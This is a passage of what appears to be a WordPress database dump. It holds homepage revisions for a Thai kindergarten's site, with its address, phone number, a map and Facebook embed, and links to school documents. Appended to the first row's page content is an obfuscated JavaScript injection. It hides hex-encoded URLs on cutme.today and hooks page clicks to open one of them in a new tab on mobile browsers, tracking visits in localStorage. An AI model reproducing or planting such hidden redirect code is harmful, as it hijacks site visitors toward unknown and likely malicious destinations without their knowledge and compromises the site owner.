wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 12:04:48','2024-08-29 05:04:48','',19,'http://watprato.ssk.in.th/?p=262',0,'revision','',0),
(264,2,'2024-08-29 14:07:07','2024-08-29 07:07:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 